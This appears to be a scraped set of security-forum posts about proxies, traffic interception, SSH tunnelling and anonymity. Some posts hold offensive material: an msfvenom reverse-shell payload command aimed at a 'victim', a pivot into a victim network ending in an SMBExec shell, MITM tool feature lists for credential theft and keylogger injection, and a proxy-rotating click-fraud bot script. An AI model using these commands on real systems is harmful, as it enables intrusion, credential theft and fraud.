Search the Community

I want to use Charles/Fiddler to capture HTTPS traffic from application. After installing trusted root certificate I've noticed that not every application will accept it. For example, I can intercept all requests made by Chrome, but on Firefox I need to add trusted certificate. When capturing traffic for Java application, certificate need to be added to JVM TrustStore, and in case of using Python script we need to add line of code that use exported certificate. How can I analyze requests made by some software that support proxy (so reverse proxy can be easily used), but after running it I cannot get plaintext as it needs trusted certificate?

In the process of setting up 2 machines for my little ones and I want to make sure they don't "accidentally" stumble upon something they shouldn't. I have parental controls and content filtering inside the router which works well, but I'm wanting to have a separate network for just the kids and I want everything on that network to be restricted to appropriate content only. Should I setup a proxy and point their browser's to route traffic through a proxy, is there a web filter app/server software you recommend? OpenDNS works well, but if I remember right I was able to somewhat view content that should have been blocked. The only thing I really want fully open is YouTube. Thanks in advance. I'm open to all suggestions, the more enterprise the better.

My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678 The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked. Now, here is the configuration of the malware generated by msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe And here is the multi/handler configuration under msf msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.102 yes The listen address LPORT 45679 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target Then I exploit, nothing happens on the handler, no session receive, but the ssh terminal continuously showing the following message once I run the malware on the victim machine connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. I did a scan on aaa.aaa.aaa.aaa:45679, no open port discovered. Since NC and apache test works, SSH tunnel should be functioning properly, so it is the handler's problem? My thought is, the multi handler is somehow not listening/connecting to the tunneled port, but I am not sure how could that happen, doesn't remote ssh tunnel automatically apply to global once the command is running? Any ideas, or workarounds? This should be a FAQ, yet, couldn't find right way... Thank you

I need help, i received an assignment to complete security testing on "Windows Desktop application" I verified the file level of security and binary code review but i want to do interception of request and response but am literally struck, in google found some tools like Echo-mirage and Wireshark - While attaching echo-mirage tool to my desktop application it showing message like "A Problem caused the program to stop working correctly windows will close the program and notify you if a solution is available." - Whireshark : am not getting proper idea on Thanks in advance, your response is highly appreciated.

it´s possible to make a middle man attack in our proxy, i mean, i want to make a proxy server on a raspberry pi 3, and get all data (like wireshark when sniffs), incluying https requests. my second question is, how to make the data get in my server (the rpi) without configuring the modem and the dmz, something like redirect the request with a external server and a client on the pi. my internet company change mi modem recently, and even so when i configure the dmz on it, and the portforwarding, the external connections don't get in, im looking for a alternative. (again, sorry for my bad english)

Saw a talk online at DefCon where someone had created a proxy server setup inject a hook into the js files a bit like Beef in kali combined with SSL stripping and MITM to grab passwords etc and thought this may be able to be used with the ducky by plugging into a computer and it automatically setting up a connection to your proxy server! For example, in Windows 10 you could use Win-Key + I to open setting and start typing proxy and hit enter to open up the right page then using tab to scroll down, then use up key to turn proxy on and keep doing the and enter the correct setup for your server and then save it! This is just an idea not sure if it's been done or if it can be done quicker using command-line or PowerShell haven't really looked at it! May not be practical please comment any suggestions!! Thanks !

Looks like a new release will be coming out soon, but even more exciting is the MITMf integration that is on the cards (Unless this is going to be in the next release!). MITMf will replace some of the infusions we have come to love and hate, and replace them with a one stop shop framework. This will hopefully solve some of the issues we were having running multiple infusions impacting the network. Now we will have the best of hardware and software MITM in one sweet pineapple! Some functionality may not make it due to being CPU intensive (FilePwn), regardless, this is going to be a giant leap! MITMf V0.9.5 Framework for Man-In-The-Middle attacks Availible plugins Responder - LLMNR, NBT-NS and MDNS poisoner SSLstrip+ - Partially bypass HSTS Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries Sniffer - Sniffs for various protocol login and auth attempts BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type AppCachePoison - Perform app cache poison attacks SessionHijacking - Performs session hijacking attacks, and stores cookies in a firefox profile BrowserProfiler - Attempts to enumerate all browser plugins of connected clients CacheKill - Kills page caching by modifying headers FilePwn - Backdoor executables being sent over http using bdfactory Inject - Inject arbitrary content into HTML content JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins jskeylogger - Injects a javascript keylogger into clients webpages Replace - Replace arbitary content in HTML content SMBAuth - Evoke SMB challenge-response auth attempts Upsidedownternet - Flips images 180 degrees Changelog Addition of the Sniffer plugin which integrates Net-Creds currently supported protocols are: FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc..) and Kerberos Integrated Responder to poison LLMNR, NBT-NS and MDNS, and act as a WPAD rogue server. Integrated SSLstrip+ by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014 Addition of the SessionHijacking plugin, which uses code from FireLamb to store cookies in a Firefox profile Spoof plugin now supports ICMP, ARP and DHCP spoofing along with DNS tampering Spoof plugin can now exploit the 'ShellShock' bug when DHCP spoofing! Usage of third party tools has been completely removed (e.g. ettercap) FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory and code from BDFProxy Added msfrpc.py for interfacing with Metasploits rpc server Added beefapi.py for interfacing with BeEF's RESTfulAPI Addition of the app-cache poisoning attack by Krzysztof Kotowicz (blogpost explaining the attack here http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html) Links: https://twitter.com/hak5darren/status/585168796739964928 https://twitter.com/sebkinne/status/585550844260700162 https://github.com/byt3bl33d3r/MITMf/

Hello, i would like to achieve a high level of anonymity in web-based applications(mainly browser) and would like to get some input by experienced users! The Goal is to not be tracable(as good as this is possible) and to have encryption aswell. First i thought of chaining a list of Proxies(at best in a random order for each package sent)before entering an SSL encrypted VPN. Through that i hope to prevent danger from sniffing into my traffic from the proxies due the encryption of the vpn and the different routes through the proxies hide my Identity from the vpn. Does this work? I am not sure how a SSL Handshake will hold on this(what if the last proxy is always the same?). Additionally i would like to add another Transport Layer Encryption (SSL proxy?, second VPN?) to prevent spying my data by a possible corrupt vpn. I find a lot of information for each topic itself but im very unsure if my idea works in generell, or which tools i can use for this. I have advanced Java, C#, and Web-development knowledge and would like to expand my very basic linux ,bash and network skills. Im also willing to try myself on c for this project, if necessary as a long term target. Please just share some links thoughts and input for this idea!

I wanted to proxify firefox on Ubuntu 15 I tried a couple of different methods. I remember it used to be just pop open firefox and manually enter the proxy IP and port in the network preferences. But it just doesn't work. I tried editing /etc/environment but no dice. Is there is a prefered method? Which configuration files or whatnot do I have to edit?

Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was 10.13.37.27, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-10.13.37.27:445-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"

I reading up on this JS Browser. I'm thinking to myself it's javascript so you could embed it into a webpage and visit it remotely. It would make proxying pretty easy. I'm thinking someone will come up with a way to exploit a client and use their browser as a proxy pretty quickly. Here's the source code: https://github.com/MicrosoftEdge/JSBrowser/ I don't have a lot of time to explore this as I'm in the midst of some other work. But I thought I would go ahead and share the source code.

This looks very promising as a replacement for what ProxyHam was supposed to be. http://samy.pl/proxygambit/ he uses 2G gsm connect so theoretically you can connect from anywhere in the world.

I'm trying to get Burpsuite integrated with PineAP on a PineappleV... is it possible? Here is my setup: - Wireless router at (192.168.1.1) for connection to the internet - PineappleV running PineAP (172.16.24.1/eth0 + 192.168.1.108/wlan1) - From the same wifi router, I have a Kali Linux machine at (192.168.1.132) listening on port 8080/tcp running Burpsuite My goal is to accept wifi clients connected from PineAP and route any web requests (HTTP/HTTPS) to 192.168.1.32:8080 (Burpsuite). Anyone know how to do this? Can I just create an iptables pre-routing rule to forward to this IP/port?

Description: This infusion will inject HTML code into a response from a server. The issue with ettercap and other proxies is that they cannot inject into SSL sessions as a result of the encryption. This infusion takes Moxie's SSLstrip and uses that as the proxy that injects code. This architecture provides 2 main benefits: Strip SSL from sessions before injecting code which allows for a larger attack surface. An asynchronous, non-blocking socket proxy provided by twisted-web gives much better performance from the client's point of view. The attacks that can be implemented from this are endless.. SSLstrip for stealing passwords and inject BeEf hook.. or Java Applets... or Browser_AutoPwn in an Iframe.. All these and more will be possible via JasagerPwn or manually. Feature Set: Installer - The installer will setup the SSLStrip dependencies. This will probably even fix your normal sslstrip infusion if you're having issues with it.Note: This does not use the default SSLStrip on the system since SSLStrip had to be modified for this purpose. Log Output - Displays the log standard output that is generated by the modified SSLStrip. Yes.. you can get passwords still in here in the process. Attacker (single address) filter - Pretty self explanitory, this adds a '! -s attacker_ip' in the iptables rule so you do not inject code into your own browsing sessions. Injection Code Editor - Allows you to enter in any arbitrary code into the text editor. Note, if you have an attack running and modify this code - you need to restart the attack. Auto Refresh Enable/Disable and Logging in Small Tile Screenshot (Interface): Screenshot (Basic Alert Pop-up): Credit: Infusion GUI: Whistle Master SSLStrip: Moxie Marlinspike Cheers!

I'd like to send all http traffic from Pineapple clients through Burp Proxy. Here is my setup: I have a Kali Linux box is providing internet to the Pineapple via ethernet using the wp5.sh script. At this point Pineapple clients are able to internet access just fine. I start Burp and it's listening on all interfaces on port 8080 in invisible mode. I think I should be able to send all of the Pineapple traffic through Burp using iptables, but I am not sure how to do so. I thought running the following on the Kali box would do it: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 But after running that my Pineapple clients have no internet access. Any idea what I'm doing wrong? I have tested Burp Proxy without the Pineapple and it is working, so I think I just need to sort out how to send the Pineapple traffic to Burp.

New here, I just got my Mark V, and discovered I understood the AutoSSH thing wrong. The purpose of buying the Wifi Pineapple was actually the opposite of its existence. I want to use it to create a private network wherever I am, and let the box connect to a public AP or mobile phone, while tunneling all traffic through an SSH (or VPN) tunnel to my home server, so the AP only sees one outgoing SSH. And so I discovered that this isn't provided out of the box and I couldn't find any topic on it. Given a few pointers I probably might come up with an infusion that adds this cool feature to the set. My first idea was a socks proxy as I sometimes use on a computer, but ideal would be to tunnel everything (DNS and all). So, pointers and comments welcome ;) Peter

Hey everyone I need serious help with that What I'm looking for : i want to all advance hidden anonymity options in backtrack ("hide my privacy 99%") So What are their? I have some options about that. > spoof mac > spoof ip > spoof ttl values > spoof http header > spoof dhcp > use live cd > use rdp > use proxy exactly I want to more hidden method to hide my id. (out of my list) anyone help me? I always searching about that. now i am really tired. I'm not a very good English writer : help me...

I'm attempting to create a mod for a game. My console requests a file from an online server and caches it. After it's cached it doesn't bother loading it again. Originally this mod was done by blocking requests to the server and redirecting it to a local server where the modified file was hosted. Now if you block the server it is unable to connect to another URL on the same server that verifies you don't have it blocked. In all I have to find a way to block a specific request for a URL (e.g http://test.site.com/file.extz) and allow others to connect to the internet. I know this should be very simple but I can't figure it out. I'm planning on running my console's traffic through my Windows PC, running my PC's traffic through a proxy that filters URLs like this: Console ------>Windows PC ( Proxy ) If request is for http://test.site.com/file.ext ----------> LOCALLY HOSTED /file.ext or WEBSERVER | | If request is not for http://test.site.com/file.ext ------------> SERVER I've been dealing with redirect after redirect all day so I'm confused! Thanks ahead of time, Zero

Tested oN Linux Mint WIth Pyhton Version 2.6.6 This Bot Coded by jimyromantic devilz for PTC and I Recode for visit web #!/usr/bin/python # This code is just for educational only ;) # coder by jimmyromanticdevil # code for tutorial Python [ Membuat Bot Auto Clicker ] import urllib2 import urllib import sys import time import random import re import os proxylisttext = "proxylist.txt" useragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Opera/8.00 (Windows NT 5.1; U; en)', 'amaya/9.51 libwww/5.4.0', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'] referer = ['http://google.com','http://bing.com','http://facebook.com','http://twitter.com'] link_invation= 'http://jadicontoh.com' def Autoclicker(proxy1): try: proxy = proxy1.split(":") print 'Auto Click Using proxy :',proxy1 proxy_set = urllib2.ProxyHandler({"http" : "%s:%d" % (proxy[0], int(proxy[1]))}) opener = urllib2.build_opener(proxy_set, urllib2.HTTPHandler) opener.addheaders = [('User-agent', random.choice(useragent)), ('Referer', random.choice(referer))] urllib2.install_opener(opener) f = urllib2.urlopen(link_invation) if "jadicontoh.com" in f.read(): print "[*] Link Berhasil Di Kunjungi ..." else: print "[*] Link gagal di kunjungi !" print "[!] Proxy failed" except: print "[!] Proxy Error " pass def loadproxy(): try: get_file = open(proxylisttext, "r") proxylist = get_file.readlines() count = 0 proxy = [] while count < len(proxylist): proxy.append(proxylist[count].strip()) count += 1 for i in proxy: Autoclicker(i) except IOError: print "\n[-] Error: Check your proxylist path\n" sys.exit(1) def main(): print """ ################################# Simulation Bot Autoclicker coder : jimmyromanticdevil ################################# """ loadproxy() if __name__ == '__main__': main() Dont Forget Change text jadicontoh.com with your website and Build proxylist.txt for your proxy list , if you dont have proxy list you can copas from http://spys.ru/en/free-proxy-list and you can cleaning for copas with this code <? $lines = file('mentah.txt'); foreach($lines as $line_num => $line) { $data = explode(' ', $line); $data = $data[1].''; $cek = explode('HTTP', $data); $cek = $cek[0].''; echo "$cek"; echo "<br>"; } ?> Copas All COntent On Spy.ru and save text on file, rename file with name mentah.txt You Can Get Cleaning Proxy With OUT , One By One Copas

I'm running my mk4 (firmware 2.8.0) with my laptop (Ubuntu 12.04), with the laptop on wifi to get internet to the pineapple (pretty standard). I'm running sslstrip and tcpdump on the laptop, rather than the pineapple. I've gotten ssh tunneling to work on the laptop, so I can use a friend's router as a socks proxy for web browsing, but I can't figure out how to make the pineapple's traffic use that proxy as well. To set up the proxy, I just do "ssh <ip address> -p 443 -D 8080", then use the network settings in Ubuntu to set the SOCKS proxy to 127.0.0.1:8080. Is there any way to make the pineapple use the proxy too? Thanks

Hi, while I was watching the end of your latest web show, I came up with a question, now I can't see this listed under the FAQ, so s0rry if this has already been done. Can the Pineapple be configured in a way, with a second Wifi dongle, to automatically fined and connect to a open hotspot, (also agree to any terms and conditions pages) then connect to a VPN or Proxy. Also disconnect after a set time or data usage and reconnect with a new mac address. All while hosting its open secure Wifi. Its an idea I had.

Hi All, Scenario/Background: I'm on a boat. We use VSAT + two year old Cisco router. Router has been locked down. The only ports open are 80 (http), 443 (https), 25 (mail), 3389 (RDP). When travelling I used to be able to use OpenVPN (udp), PPTP VPN (tcp), or a socksified (-D) SSH connection to tunnel my traffic. That's no longer the case. I borked my VPS server trying to get around the above stated issue. It's left me in a bit of a pickle. I can use TOR to get to my VPS's CPANEL (control panel). I have to use a service like TOR, because the CPANEL is on a non-standard web port (5454). I can't reinstall the server though. To do that I need to VNC to the VPS. I use 'Chicken of the VNC' which doesn't support proxying, like a web browser. I've looked at a few options, like NoVNC, etc which are browser based HTML5 implementations of a VNC client but they rely on a companion server which my VPS is not running. Any ideas? (1A) Help! *I'm asking a friend to remotely reconfigure my server, and to run SSH on port 443 so I'll have SSH access and web proxying ability, but it has led me to even more questions. I hope that the firewall doesn't filter to the Layer 7 networking stack, otherwise I might need a better solution. What are some ways to accomplish this? (2A) Below is what I've found so far. Please help me add to the list of possibilites. Is there a software solution (Mac OS X or Ubuntu) that allows a user to specify which application uses the socksified SSH connection (ex ssh -D 8080 username@y.y.y.y) on the local machine? (3A) It woud be ideal if an application could force traffic over the SSH connection. Example, tell 'Chicken of the VNC', Adium, etc to route through SSH without having to set a proxy in their individual preferences (most don't even have the option/ability). Future Solutions 1B. #Ubuntu wiki says this might be a problem on some VPS's - https://help.ubuntu....y/IptablesHowTo #execute on remote server iptables -t nat -I PREROUTING -p tcp -m conntrack --ctstate NEW -s x.x.x.x -d y.y.y.y --dport 443 -j REDIRECT --to-port 22 or #execute on remote server iptables -t nat -I PREROUTING --src x.x.x.x --dst y.y.y.y -p tcp --dport 443 -j REDIRECT --to-ports 22 sudo iptables -t nat -L -n -v #execute on local machine in Terminal ssh -p 443 -D 8080 username@y.y.y.y 2B. http://www.thoughtcr...tware/firemole/ 3B. http://dag.wieers.co...http-tunneling/ *anyone know of a more current way to do this? (4A) software doesn't look like it's been updated since 2009 4B. sudo nano /etc/ssh/sshd_config change the line "Port 22" to "Port 443" to save --> hit ctrl+o, then ctrl+x sudo restart ssh *how does encrypted web traffic (https 443) still work if SSH is now using port 443 on the VPS? (5A)